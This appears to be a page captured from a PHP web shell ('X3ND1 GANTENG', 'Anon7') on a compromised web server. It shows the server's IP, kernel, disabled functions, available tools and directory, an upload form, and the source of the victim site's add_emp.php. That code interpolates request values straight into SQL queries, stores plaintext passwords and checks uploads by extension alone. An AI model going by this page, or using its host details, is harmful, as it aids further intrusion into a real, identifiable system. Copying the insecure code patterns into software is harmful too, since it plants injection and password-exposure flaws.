X3ND1 GANTENG

Server IP : 108.163.255.210 / Your IP : 3.149.214.28
Web Server : Apache
System : Linux blossom.urlnameserver.com 3.10.0-1160.80.1.el7.x86_64 #1 SMP Tue Nov 8 15:48:59 UTC 2022 x86_64
User : ( 1172)
PHP Version : 7.2.34
Disable Function : eval,escapeshellarg,proc_close,proc_get_status,proc_nice,proc_open,symlink,system,pcntl_exec,getrusage,chown,chgp,closelog,openlog,syslog,define_syslog_variables,php_ini_loaded_file,getservbyname,getservbyport,posix_getgid,posix_getgrgid,proc_terminate,pfsockopen,apache_child_terminate,posix_mkfifo,posix_setpgid,posix_setuid,hypot,pg_host,pos,posix_access,posix_getcwd,posix_getservbyname,myshellexec,getpid,posix_getsid,posix_isatty,posix_kill,posix_mknod,posix_setgid,posix_setsid,posix_setuid,posix_times,posix_uname,ps_fill,posix_getpwuid,global,ini_restore,zip_open,zip_read,rar_open,bzopen,bzread,bzwrite,apache_get_modules,apache_get_version,phpversionphpinfo,php_ini_scanned_files,get_current_user,disk_total_space,diskfreespace,leak,imap_list,hypo,filedump,safe_mode,getmygid,apache_getenv,apache_setenv,bzread,bzwrite,bzopen,phpini,higlight_file,dos_conv,get_cwd,er_log,cmd,e_name,vdir,get_dir,only_read,ftok,ftpexec,posix_getpwnam,mysql_list_dbs,disk_free_space,session_save_path,confirm_phpdoc_compiled,zip_entry_rea,php_u,psockopen,crack_opendict,crack_getlastmessage,crack_closedict,crack_check,fpassthru,posix_get_last_error,posix_getlogin,posix_getgroups,posix_strerror,posix_getrlimit,posix_getpgrp,posix_getgrnam,pos,dl
MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON
Directory : /home/unilinki/www/Intellilead/users/

Upload File :

[ BERANDA ]

Current File : /home/unilinki/www/Intellilead/users/add_emp.php

<?php
require "../includes/authenticate.php";
if(isset($_REQUEST['adduser']) && $_REQUEST['adduser']=='submit')
{
	
	$usertype="4";
	$username = valid_data(str_replace("''","'",$_POST["user"]));
	$name = valid_data(str_replace("''","'",$_POST["name"]));
	$pass = valid_data(str_replace("''","'",$_POST["password"]));
	$contact = valid_data(str_replace("''","'",$_POST["contact"]));
	$email = valid_data(str_replace("''","'",$_POST["email"]));
	$email2 = valid_data(str_replace("''","'",$_POST["email2"]));
	
	$rep_head = valid_data(str_replace("''","'",$_POST["rep_head"]));
	$role = valid_data(str_replace("''","'",$_POST["role"]));
	$dept_id = valid_data(str_replace("''","'",$_POST["dept_id"]));
	$desi_id = valid_data(str_replace("''","'",$_POST["desi_id"]));
	$userimage	         =  $_POST['image'];
	
	
	if(isset($_POST['action']))
		$u_action = implode(",",$_POST['action']);
	else
		$u_action = "0";
	
	$sql="select COUNT(user_id) from mstr_user where email_id='$email' and company_id='".$_SESSION['company_id']."' OR user_name='$username' and company_id='".$_SESSION['company_id']."';";
	$res= getSingleResult($sql);
	
	if($res != 0){
		$_SESSION['sess_msg'] =  "THIS USER ALREADY EXISTS. PLEASE INSERT ANOTHER ONE.";
		header('Location: add_emp_form.php');
		exit;
	} else{
		
	//----------------------------------------Image------------------------------------------------------//
	if($_FILES['image']['name']!=""){
			$ext_allowed	= array ("gif", "jpg", "jpeg", "png");
			$img_prefix		= date('Ymdhis')."_";//str_replace(" ", "_", $product_name)."_";
			$file_name		= $_FILES['image']['name'];
			$pos			= strrpos($file_name, ".");
			$len			= strlen($file_name);
			$ext			= substr($file_name ,$pos+1, $len-1);
			$ext			= strtolower($ext);
			if (in_array ($ext, $ext_allowed)) {
				if (is_uploaded_file($_FILES['image']['tmp_name'])){
					$userimage		= $img_prefix.$file_name;
					@copy($_FILES['image']['tmp_name'], "../resources/user/".$userimage);
					//$image_thumb	= make_thumb("uploaded/thumb/".$image1, 	250, 150,"uploaded/thumb/");
				}
			}
	}else{
		$userimage   = "";
	}		
	///End Image//
		
	$sql="INSERT INTO mstr_user(user_type,user_name,name,password,pass,contact_no,email_id,image,role_id,rep_head,email2,dept_id,designation,action,status,company_id,created_by,created_date) values('$usertype','$username','$name','".crypt_now($pass)."','$pass','$contact','$email','$userimage','$role','$rep_head','$email2','$dept_id','$desi_id','$u_action','Active','".$_SESSION['company_id']."','".$_SESSION['user_id']."',NOW())";
	executeQuery($sql);
	
	$_SESSION['sess_msg'] = "USER ADDED SUCCESSFULLY";
	header('Location: manage_user.php');
	exit();
	}
}
?>

Anon7 - 2022
SCDN GOK